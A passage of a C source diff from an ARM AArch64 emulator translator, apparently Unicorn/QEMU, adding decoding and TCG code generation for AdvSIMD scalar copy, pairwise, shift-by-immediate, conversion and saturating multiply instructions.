tcg_const_i64(tcg_ctx, imm); + tcg_rd = new_tmp_a64(s); + + for (i = 0; i < 2; i++) { + int foffs = i ? fp_reg_hi_offset(s, rd) : fp_reg_offset(s, rd, MO_64); + + if (i == 1 && !is_q) { + /* non-quad ops clear high half of vector */ + tcg_gen_movi_i64(tcg_ctx, tcg_rd, 0); + } else if ((cmode & 0x9) == 0x1 || (cmode & 0xd) == 0x9) { + tcg_gen_ld_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, foffs); + if (is_neg) { + /* AND (BIC) */ + tcg_gen_and_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_imm); + } else { + /* ORR */ + tcg_gen_or_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_imm); + } + } else { + /* MOVI */ + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_imm); + } + tcg_gen_st_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, foffs); + } + + tcg_temp_free_i64(tcg_ctx, tcg_imm); +} + +/* C3.6.7 AdvSIMD scalar copy + * 31 30 29 28 21 20 16 15 14 11 10 9 5 4 0 + * +-----+----+-----------------+------+---+------+---+------+------+ + * | 0 1 | op | 1 1 1 1 0 0 0 0 | imm5 | 0 | imm4 | 1 | Rn | Rd | + * +-----+----+-----------------+------+---+------+---+------+------+ + */ +static void disas_simd_scalar_copy(DisasContext *s, uint32_t insn) +{ + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int imm4 = extract32(insn, 11, 4); + int imm5 = extract32(insn, 16, 5); + int op = extract32(insn, 29, 1); + + if (op != 0 || imm4 != 0) { + unallocated_encoding(s); + return; + } + + /* DUP (element, scalar) */ + handle_simd_dupes(s, rd, rn, imm5); +} + +/* C3.6.8 AdvSIMD scalar pairwise + * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 + * +-----+---+-----------+------+-----------+--------+-----+------+------+ + * | 0 1 | U | 1 1 1 1 0 | size | 1 1 0 0 0 | opcode | 1 0 | Rn | Rd | + * +-----+---+-----------+------+-----------+--------+-----+------+------+ + */ +static void disas_simd_scalar_pairwise(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int u = extract32(insn, 29, 1); + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + TCGv_ptr fpst; + + /* For some ops (the FP ones), size[1] is part of the encoding. + * For ADDP strictly it is not but size[1] is always 1 for valid + * encodings. + */ + opcode |= (extract32(size, 1, 1) << 5); + + switch (opcode) { + case 0x3b: /* ADDP */ + if (u || size != 3) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + + TCGV_UNUSED_PTR(fpst); + break; + case 0xc: /* FMAXNMP */ + case 0xd: /* FADDP */ + case 0xf: /* FMAXP */ + case 0x2c: /* FMINNMP */ + case 0x2f: /* FMINP */ + /* FP op, size[0] is 32 or 64 bit */ + if (!u) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + + size = extract32(size, 0, 1) ? 3 : 2; + fpst = get_fpstatus_ptr(tcg_ctx); + break; + default: + unallocated_encoding(s); + return; + } + + if (size == 3) { + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op1, rn, 0, MO_64); + read_vec_element(s, tcg_op2, rn, 1, MO_64); + + switch (opcode) { + case 0x3b: /* ADDP */ + tcg_gen_add_i64(tcg_ctx, tcg_res, tcg_op1, tcg_op2); + break; + case 0xc: /* FMAXNMP */ + gen_helper_vfp_maxnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0xd: /* FADDP */ + gen_helper_vfp_addd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0xf: /* FMAXP */ + gen_helper_vfp_maxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x2c: /* FMINNMP */ + gen_helper_vfp_minnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x2f: /* FMINP */ + gen_helper_vfp_mind(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + default: + g_assert_not_reached(); + } + + write_fp_dreg(s, rd, tcg_res); + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + tcg_temp_free_i64(tcg_ctx, tcg_res); + } else { + TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_op1, rn, 0, MO_32); + read_vec_element_i32(s, tcg_op2, rn, 1, MO_32); + + switch (opcode) { + case 0xc: /* FMAXNMP */ + gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0xd: /* FADDP */ + gen_helper_vfp_adds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0xf: /* FMAXP */ + gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x2c: /* FMINNMP */ + gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x2f: /* FMINP */ + gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + default: + g_assert_not_reached(); + } + + write_fp_sreg(s, rd, tcg_res); + + tcg_temp_free_i32(tcg_ctx, tcg_op1); + tcg_temp_free_i32(tcg_ctx, tcg_op2); + tcg_temp_free_i32(tcg_ctx, tcg_res); + } + + if (!TCGV_IS_UNUSED_PTR(fpst)) { + tcg_temp_free_ptr(tcg_ctx, fpst); + } +} + +/* + * Common SSHR[RA]/USHR[RA] - Shift right (optional rounding/accumulate) + * + * This code is handles the common shifting code and is used by both + * the vector and scalar code. + */ +static void handle_shri_with_rndacc(DisasContext *s, TCGv_i64 tcg_res, TCGv_i64 tcg_src, + TCGv_i64 tcg_rnd, bool accumulate, + bool is_u, int size, int shift) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + bool extended_result = false; + bool round = !TCGV_IS_UNUSED_I64(tcg_rnd); + int ext_lshift = 0; + TCGv_i64 tcg_src_hi; + + if (round && size == 3) { + extended_result = true; + ext_lshift = 64 - shift; + tcg_src_hi = tcg_temp_new_i64(tcg_ctx); + } else if (shift == 64) { + if (!accumulate && is_u) { + /* result is zero */ + tcg_gen_movi_i64(tcg_ctx, tcg_res, 0); + return; + } + } + + /* Deal with the rounding step */ + if (round) { + if (extended_result) { + TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); + if (!is_u) { + /* take care of sign extending tcg_res */ + tcg_gen_sari_i64(tcg_ctx, tcg_src_hi, tcg_src, 63); + tcg_gen_add2_i64(tcg_ctx, tcg_src, tcg_src_hi, + tcg_src, tcg_src_hi, + tcg_rnd, tcg_zero); + } else { + tcg_gen_add2_i64(tcg_ctx, tcg_src, tcg_src_hi, + tcg_src, tcg_zero, + tcg_rnd, tcg_zero); + } + tcg_temp_free_i64(tcg_ctx, tcg_zero); + } else { + tcg_gen_add_i64(tcg_ctx, tcg_src, tcg_src, tcg_rnd); + } + } + + /* Now do the shift right */ + if (round && extended_result) { + /* extended case, >64 bit precision required */ + if (ext_lshift == 0) { + /* special case, only high bits matter */ + tcg_gen_mov_i64(tcg_ctx, tcg_src, tcg_src_hi); + } else { + tcg_gen_shri_i64(tcg_ctx, tcg_src, tcg_src, shift); + tcg_gen_shli_i64(tcg_ctx, tcg_src_hi, tcg_src_hi, ext_lshift); + tcg_gen_or_i64(tcg_ctx, tcg_src, tcg_src, tcg_src_hi); + } + } else { + if (is_u) { + if (shift == 64) { + /* essentially shifting in 64 zeros */ + tcg_gen_movi_i64(tcg_ctx, tcg_src, 0); + } else { + tcg_gen_shri_i64(tcg_ctx, tcg_src, tcg_src, shift); + } + } else { + if (shift == 64) { + /* effectively extending the sign-bit */ + tcg_gen_sari_i64(tcg_ctx, tcg_src, tcg_src, 63); + } else { + tcg_gen_sari_i64(tcg_ctx, tcg_src, tcg_src, shift); + } + } + } + + if (accumulate) { + tcg_gen_add_i64(tcg_ctx, tcg_res, tcg_res, tcg_src); + } else { + tcg_gen_mov_i64(tcg_ctx, tcg_res, tcg_src); + } + + if (extended_result) { + tcg_temp_free_i64(tcg_ctx, tcg_src_hi); + } +} + +/* Common SHL/SLI - Shift left with an optional insert */ +static void handle_shli_with_ins(TCGContext *tcg_ctx, TCGv_i64 tcg_res, TCGv_i64 tcg_src, + bool insert, int shift) +{ + if (insert) { /* SLI */ + tcg_gen_deposit_i64(tcg_ctx, tcg_res, tcg_res, tcg_src, shift, 64 - shift); + } else { /* SHL */ + tcg_gen_shli_i64(tcg_ctx, tcg_res, tcg_src, shift); + } +} + +/* SRI: shift right with insert */ +static void handle_shri_with_ins(TCGContext *tcg_ctx, TCGv_i64 tcg_res, TCGv_i64 tcg_src, + int size, int shift) +{ + int esize = 8 << size; + + /* shift count same as element size is valid but does nothing; + * special case to avoid potential shift by 64. + */ + if (shift != esize) { + tcg_gen_shri_i64(tcg_ctx, tcg_src, tcg_src, shift); + tcg_gen_deposit_i64(tcg_ctx, tcg_res, tcg_res, tcg_src, 0, esize - shift); + } +} + +/* SSHR[RA]/USHR[RA] - Scalar shift right (optional rounding/accumulate) */ +static void handle_scalar_simd_shri(DisasContext *s, + bool is_u, int immh, int immb, + int opcode, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + const int size = 3; + int immhb = immh << 3 | immb; + int shift = 2 * (8 << size) - immhb; + bool accumulate = false; + bool round = false; + bool insert = false; + TCGv_i64 tcg_rn; + TCGv_i64 tcg_rd; + TCGv_i64 tcg_round; + + if (!extract32(immh, 3, 1)) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + switch (opcode) { + case 0x02: /* SSRA / USRA (accumulate) */ + accumulate = true; + break; + case 0x04: /* SRSHR / URSHR (rounding) */ + round = true; + break; + case 0x06: /* SRSRA / URSRA (accum + rounding) */ + accumulate = round = true; + break; + case 0x08: /* SRI */ + insert = true; + break; + } + + if (round) { + uint64_t round_const = 1ULL << (shift - 1); + tcg_round = tcg_const_i64(tcg_ctx, round_const); + } else { + TCGV_UNUSED_I64(tcg_round); + } + + tcg_rn = read_fp_dreg(s, rn); + tcg_rd = (accumulate || insert) ? read_fp_dreg(s, rd) : tcg_temp_new_i64(tcg_ctx); + + if (insert) { + handle_shri_with_ins(tcg_ctx, tcg_rd, tcg_rn, size, shift); + } else { + handle_shri_with_rndacc(s, tcg_rd, tcg_rn, tcg_round, + accumulate, is_u, size, shift); + } + + write_fp_dreg(s, rd, tcg_rd); + + tcg_temp_free_i64(tcg_ctx, tcg_rn); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + if (round) { + tcg_temp_free_i64(tcg_ctx, tcg_round); + } +} + +/* SHL/SLI - Scalar shift left */ +static void handle_scalar_simd_shli(DisasContext *s, bool insert, + int immh, int immb, int opcode, + int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = 32 - clz32(immh) - 1; + int immhb = immh << 3 | immb; + int shift = immhb - (8 << size); + TCGv_i64 tcg_rn = new_tmp_a64(s); + TCGv_i64 tcg_rd = new_tmp_a64(s); + + if (!extract32(immh, 3, 1)) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + tcg_rn = read_fp_dreg(s, rn); + tcg_rd = insert ? read_fp_dreg(s, rd) : tcg_temp_new_i64(tcg_ctx); + + handle_shli_with_ins(tcg_ctx, tcg_rd, tcg_rn, insert, shift); + + write_fp_dreg(s, rd, tcg_rd); + + tcg_temp_free_i64(tcg_ctx, tcg_rn); + tcg_temp_free_i64(tcg_ctx, tcg_rd); +} + +/* SQSHRN/SQSHRUN - Saturating (signed/unsigned) shift right with + * (signed/unsigned) narrowing */ +static void handle_vec_simd_sqshrn(DisasContext *s, bool is_scalar, bool is_q, + bool is_u_shift, bool is_u_narrow, + int immh, int immb, int opcode, + int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int immhb = immh << 3 | immb; + int size = 32 - clz32(immh) - 1; + int esize = 8 << size; + int shift = (2 * esize) - immhb; + int elements = is_scalar ? 1 : (64 / esize); + bool round = extract32(opcode, 0, 1); + TCGMemOp ldop = (size + 1) | (is_u_shift ? 0 : MO_SIGN); + TCGv_i64 tcg_rn, tcg_rd, tcg_round; + TCGv_i32 tcg_rd_narrowed; + TCGv_i64 tcg_final; + + static NeonGenNarrowEnvFn * const signed_narrow_fns[4][2] = { + { gen_helper_neon_narrow_sat_s8, + gen_helper_neon_unarrow_sat8 }, + { gen_helper_neon_narrow_sat_s16, + gen_helper_neon_unarrow_sat16 }, + { gen_helper_neon_narrow_sat_s32, + gen_helper_neon_unarrow_sat32 }, + { NULL, NULL }, + }; + static NeonGenNarrowEnvFn * const unsigned_narrow_fns[4] = { + gen_helper_neon_narrow_sat_u8, + gen_helper_neon_narrow_sat_u16, + gen_helper_neon_narrow_sat_u32, + NULL + }; + NeonGenNarrowEnvFn *narrowfn; + + int i; + + assert(size < 4); + + if (extract32(immh, 3, 1)) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (is_u_shift) { + narrowfn = unsigned_narrow_fns[size]; + } else { + narrowfn = signed_narrow_fns[size][is_u_narrow ? 1 : 0]; + } + + tcg_rn = tcg_temp_new_i64(tcg_ctx); + tcg_rd = tcg_temp_new_i64(tcg_ctx); + tcg_rd_narrowed = tcg_temp_new_i32(tcg_ctx); + tcg_final = tcg_const_i64(tcg_ctx, 0); + + if (round) { + uint64_t round_const = 1ULL << (shift - 1); + tcg_round = tcg_const_i64(tcg_ctx, round_const); + } else { + TCGV_UNUSED_I64(tcg_round); + } + + for (i = 0; i < elements; i++) { + read_vec_element(s, tcg_rn, rn, i, ldop); + handle_shri_with_rndacc(s, tcg_rd, tcg_rn, tcg_round, + false, is_u_shift, size+1, shift); + narrowfn(tcg_ctx, tcg_rd_narrowed, tcg_ctx->cpu_env, tcg_rd); + tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_rd_narrowed); + tcg_gen_deposit_i64(tcg_ctx, tcg_final, tcg_final, tcg_rd, esize * i, esize); + } + + if (!is_q) { + clear_vec_high(s, rd); + write_vec_element(s, tcg_final, rd, 0, MO_64); + } else { + write_vec_element(s, tcg_final, rd, 1, MO_64); + } + + if (round) { + tcg_temp_free_i64(tcg_ctx, tcg_round); + } + tcg_temp_free_i64(tcg_ctx, tcg_rn); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + tcg_temp_free_i32(tcg_ctx, tcg_rd_narrowed); + tcg_temp_free_i64(tcg_ctx, tcg_final); + return; +} + +/* SQSHLU, UQSHL, SQSHL: saturating left shifts */ +static void handle_simd_qshl(DisasContext *s, bool scalar, bool is_q, + bool src_unsigned, bool dst_unsigned, + int immh, int immb, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int immhb = immh << 3 | immb; + int size = 32 - clz32(immh) - 1; + int shift = immhb - (8 << size); + int pass; + + assert(immh != 0); + assert(!(scalar && is_q)); + + if (!scalar) { + if (!is_q && extract32(immh, 3, 1)) { + unallocated_encoding(s); + return; + } + + /* Since we use the variable-shift helpers we must + * replicate the shift count into each element of + * the tcg_shift value. + */ + switch (size) { + case 0: + shift |= shift << 8; + /* fall through */ + case 1: + shift |= shift << 16; + break; + case 2: + case 3: + break; + default: + g_assert_not_reached(); + } + } + + if (!fp_access_check(s)) { + return; + } + + if (size == 3) { + TCGv_i64 tcg_shift = tcg_const_i64(tcg_ctx, shift); + static NeonGenTwo64OpEnvFn * const fns[2][2] = { + { gen_helper_neon_qshl_s64, gen_helper_neon_qshlu_s64 }, + { NULL, gen_helper_neon_qshl_u64 }, + }; + NeonGenTwo64OpEnvFn *genfn = fns[src_unsigned][dst_unsigned]; + int maxpass = is_q ? 2 : 1; + + for (pass = 0; pass < maxpass; pass++) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op, rn, pass, MO_64); + genfn(tcg_ctx, tcg_op, tcg_ctx->cpu_env, tcg_op, tcg_shift); + write_vec_element(s, tcg_op, rd, pass, MO_64); + + tcg_temp_free_i64(tcg_ctx, tcg_op); + } + tcg_temp_free_i64(tcg_ctx, tcg_shift); + + if (!is_q) { + clear_vec_high(s, rd); + } + } else { + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, shift); + static NeonGenTwoOpEnvFn * const fns[2][2][3] = { + { + { gen_helper_neon_qshl_s8, + gen_helper_neon_qshl_s16, + gen_helper_neon_qshl_s32 }, + { gen_helper_neon_qshlu_s8, + gen_helper_neon_qshlu_s16, + gen_helper_neon_qshlu_s32 } + }, { + { NULL, NULL, NULL }, + { gen_helper_neon_qshl_u8, + gen_helper_neon_qshl_u16, + gen_helper_neon_qshl_u32 } + } + }; + NeonGenTwoOpEnvFn *genfn = fns[src_unsigned][dst_unsigned][size]; + TCGMemOp memop = scalar ? size : MO_32; + int maxpass = scalar ? 1 : is_q ? 4 : 2; + + for (pass = 0; pass < maxpass; pass++) { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_op, rn, pass, memop); + genfn(tcg_ctx, tcg_op, tcg_ctx->cpu_env, tcg_op, tcg_shift); + if (scalar) { + switch (size) { + case 0: + tcg_gen_ext8u_i32(tcg_ctx, tcg_op, tcg_op); + break; + case 1: + tcg_gen_ext16u_i32(tcg_ctx, tcg_op, tcg_op); + break; + case 2: + break; + default: + g_assert_not_reached(); + } + write_fp_sreg(s, rd, tcg_op); + } else { + write_vec_element_i32(s, tcg_op, rd, pass, MO_32); + } + + tcg_temp_free_i32(tcg_ctx, tcg_op); + } + tcg_temp_free_i32(tcg_ctx, tcg_shift); + + if (!is_q && !scalar) { + clear_vec_high(s, rd); + } + } +} + +/* Common vector code for handling integer to FP conversion */ +static void handle_simd_intfp_conv(DisasContext *s, int rd, int rn, + int elements, int is_signed, + int fracbits, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + bool is_double = size == 3 ? true : false; + TCGv_ptr tcg_fpst = get_fpstatus_ptr(tcg_ctx); + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, fracbits); + TCGv_i64 tcg_int = tcg_temp_new_i64(tcg_ctx); + TCGMemOp mop = size | (is_signed ? MO_SIGN : 0); + int pass; + + for (pass = 0; pass < elements; pass++) { + read_vec_element(s, tcg_int, rn, pass, mop); + + if (is_double) { + TCGv_i64 tcg_double = tcg_temp_new_i64(tcg_ctx); + if (is_signed) { + gen_helper_vfp_sqtod(tcg_ctx, tcg_double, tcg_int, + tcg_shift, tcg_fpst); + } else { + gen_helper_vfp_uqtod(tcg_ctx, tcg_double, tcg_int, + tcg_shift, tcg_fpst); + } + if (elements == 1) { + write_fp_dreg(s, rd, tcg_double); + } else { + write_vec_element(s, tcg_double, rd, pass, MO_64); + } + tcg_temp_free_i64(tcg_ctx, tcg_double); + } else { + TCGv_i32 tcg_single = tcg_temp_new_i32(tcg_ctx); + if (is_signed) { + gen_helper_vfp_sqtos(tcg_ctx, tcg_single, tcg_int, + tcg_shift, tcg_fpst); + } else { + gen_helper_vfp_uqtos(tcg_ctx, tcg_single, tcg_int, + tcg_shift, tcg_fpst); + } + if (elements == 1) { + write_fp_sreg(s, rd, tcg_single); + } else { + write_vec_element_i32(s, tcg_single, rd, pass, MO_32); + } + tcg_temp_free_i32(tcg_ctx, tcg_single); + } + } + + if (!is_double && elements == 2) { + clear_vec_high(s, rd); + } + + tcg_temp_free_i64(tcg_ctx, tcg_int); + tcg_temp_free_ptr(tcg_ctx, tcg_fpst); + tcg_temp_free_i32(tcg_ctx, tcg_shift); +} + +/* UCVTF/SCVTF - Integer to FP conversion */ +static void handle_simd_shift_intfp_conv(DisasContext *s, bool is_scalar, + bool is_q, bool is_u, + int immh, int immb, int opcode, + int rn, int rd) +{ + bool is_double = extract32(immh, 3, 1); + int size = is_double ? MO_64 : MO_32; + int elements; + int immhb = immh << 3 | immb; + int fracbits = (is_double ? 128 : 64) - immhb; + + if (!extract32(immh, 2, 2)) { + unallocated_encoding(s); + return; + } + + if (is_scalar) { + elements = 1; + } else { + elements = is_double ? 2 : is_q ? 4 : 2; + if (is_double && !is_q) { + unallocated_encoding(s); + return; + } + } + + if (!fp_access_check(s)) { + return; + } + + /* immh == 0 would be a failure of the decode logic */ + g_assert(immh); + + handle_simd_intfp_conv(s, rd, rn, elements, !is_u, fracbits, size); +} + +/* FCVTZS, FVCVTZU - FP to fixedpoint conversion */ +static void handle_simd_shift_fpint_conv(DisasContext *s, bool is_scalar, + bool is_q, bool is_u, + int immh, int immb, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + bool is_double = extract32(immh, 3, 1); + int immhb = immh << 3 | immb; + int fracbits = (is_double ? 128 : 64) - immhb; + int pass; + TCGv_ptr tcg_fpstatus; + TCGv_i32 tcg_rmode, tcg_shift; + + if (!extract32(immh, 2, 2)) { + unallocated_encoding(s); + return; + } + + if (!is_scalar && !is_q && is_double) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + assert(!(is_scalar && is_q)); + + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(FPROUNDING_ZERO)); + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_fpstatus = get_fpstatus_ptr(tcg_ctx); + tcg_shift = tcg_const_i32(tcg_ctx, fracbits); + + if (is_double) { + int maxpass = is_scalar ? 1 : 2; + + for (pass = 0; pass < maxpass; pass++) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op, rn, pass, MO_64); + if (is_u) { + gen_helper_vfp_touqd(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus); + } else { + gen_helper_vfp_tosqd(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus); + } + write_vec_element(s, tcg_op, rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_op); + } + if (!is_q) { + clear_vec_high(s, rd); + } + } else { + int maxpass = is_scalar ? 1 : is_q ? 4 : 2; + for (pass = 0; pass < maxpass; pass++) { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_op, rn, pass, MO_32); + if (is_u) { + gen_helper_vfp_touls(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus); + } else { + gen_helper_vfp_tosls(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus); + } + if (is_scalar) { + write_fp_sreg(s, rd, tcg_op); + } else { + write_vec_element_i32(s, tcg_op, rd, pass, MO_32); + } + tcg_temp_free_i32(tcg_ctx, tcg_op); + } + if (!is_q && !is_scalar) { + clear_vec_high(s, rd); + } + } + + tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); +} + +/* C3.6.9 AdvSIMD scalar shift by immediate + * 31 30 29 28 23 22 19 18 16 15 11 10 9 5 4 0 + * +-----+---+-------------+------+------+--------+---+------+------+ + * | 0 1 | U | 1 1 1 1 1 0 | immh | immb | opcode | 1 | Rn | Rd | + * +-----+---+-------------+------+------+--------+---+------+------+ + * + * This is the scalar version so it works on a fixed sized registers + */ +static void disas_simd_scalar_shift_imm(DisasContext *s, uint32_t insn) +{ + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int opcode = extract32(insn, 11, 5); + int immb = extract32(insn, 16, 3); + int immh = extract32(insn, 19, 4); + bool is_u = extract32(insn, 29, 1); + + if (immh == 0) { + unallocated_encoding(s); + return; + } + + switch (opcode) { + case 0x08: /* SRI */ + if (!is_u) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x00: /* SSHR / USHR */ + case 0x02: /* SSRA / USRA */ + case 0x04: /* SRSHR / URSHR */ + case 0x06: /* SRSRA / URSRA */ + handle_scalar_simd_shri(s, is_u, immh, immb, opcode, rn, rd); + break; + case 0x0a: /* SHL / SLI */ + handle_scalar_simd_shli(s, is_u, immh, immb, opcode, rn, rd); + break; + case 0x1c: /* SCVTF, UCVTF */ + handle_simd_shift_intfp_conv(s, true, false, is_u, immh, immb, + opcode, rn, rd); + break; + case 0x10: /* SQSHRUN, SQSHRUN2 */ + case 0x11: /* SQRSHRUN, SQRSHRUN2 */ + if (!is_u) { + unallocated_encoding(s); + return; + } + handle_vec_simd_sqshrn(s, true, false, false, true, + immh, immb, opcode, rn, rd); + break; + case 0x12: /* SQSHRN, SQSHRN2, UQSHRN */ + case 0x13: /* SQRSHRN, SQRSHRN2, UQRSHRN, UQRSHRN2 */ + handle_vec_simd_sqshrn(s, true, false, is_u, is_u, + immh, immb, opcode, rn, rd); + break; + case 0xc: /* SQSHLU */ + if (!is_u) { + unallocated_encoding(s); + return; + } + handle_simd_qshl(s, true, false, false, true, immh, immb, rn, rd); + break; + case 0xe: /* SQSHL, UQSHL */ + handle_simd_qshl(s, true, false, is_u, is_u, immh, immb, rn, rd); + break; + case 0x1f: /* FCVTZS, FCVTZU */ + handle_simd_shift_fpint_conv(s, true, false, is_u, immh, immb, rn, rd); + break; + default: + unallocated_encoding(s); + break; + } +} + +/* C3.6.10 AdvSIMD scalar three different + * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 + * +-----+---+-----------+------+---+------+--------+-----+------+------+ + * | 0 1 | U | 1 1 1 1 0 | size | 1 | Rm | opcode | 0 0 | Rn | Rd | + * +-----+---+-----------+------+---+------+--------+-----+------+------+ + */ +static void disas_simd_scalar_three_reg_diff(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + bool is_u = extract32(insn, 29, 1); + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 4); + int rm = extract32(insn, 16, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + + if (is_u) { + unallocated_encoding(s); + return; + } + + switch (opcode) { + case 0x9: /* SQDMLAL, SQDMLAL2 */ + case 0xb: /* SQDMLSL, SQDMLSL2 */ + case 0xd: /* SQDMULL, SQDMULL2 */ + if (size == 0 || size == 3) { + unallocated_encoding(s); + return; + } + break; + default: + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (size == 2) { + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op1, rn, 0, MO_32 | MO_SIGN); + read_vec_element(s, tcg_op2, rm, 0, MO_32 | MO_SIGN); + + tcg_gen_mul_i64(tcg_ctx, tcg_res, tcg_op1, tcg_op2); + gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_res, tcg_res); + + switch (opcode) { + case 0xd: /* SQDMULL, SQDMULL2 */ + break; + case 0xb: /* SQDMLSL, SQDMLSL2 */ + tcg_gen_neg_i64(tcg_ctx, tcg_res, tcg_res); + /* fall through */ + case 0x9: /* SQDMLAL, SQDMLAL2 */ + read_vec_element(s, tcg_op1, rd, 0, MO_64); + gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res, tcg_ctx->cpu_env, + tcg_res, tcg_op1); + break; + default: + g_assert_not_reached(); + } + + write_fp_dreg(s, rd, tcg_res); + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + tcg_temp_free_i64(tcg_ctx, tcg_res); + } else { + TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + + read_vec_element_i32(s, tcg_op1, rn, 0, MO_16); + read_vec_element_i32(s, tcg_op2, rm, 0, MO_16); + + gen_helper_neon_mull_s16(tcg_ctx, tcg_res, tcg_op1, tcg_op2); + gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_res, tcg_res); + + switch (opcode) { + case 0xd: /* SQDMULL, SQDMULL2 */ + break; + case 0xb: /* SQDMLSL, SQDMLSL2 */ + gen_helper_neon_negl_u32(tcg_ctx, tcg_res, tcg_res); + /* fall through */ + case 0x9: /* SQDMLAL, SQDMLAL2 */ + { + TCGv_i64 tcg_op3 = tcg_temp_new_i64(tcg_ctx); + read_vec_element(s, tcg_op3, rd, 0, MO_32); + gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, + tcg_res, tcg_op3); + tcg_temp_free_i64(tcg_ctx, tcg_op3); + break; + } + default: + g_assert_not_reached(); + } + + tcg_gen_ext32u_i64(tcg_ctx, tcg_res, tcg_res); + write_fp_dreg(s, rd, tcg_res); + + tcg_temp_free_i32(tcg_ctx, tcg_op1); + tcg_temp_free_i32(tcg_ctx, tcg_op2); 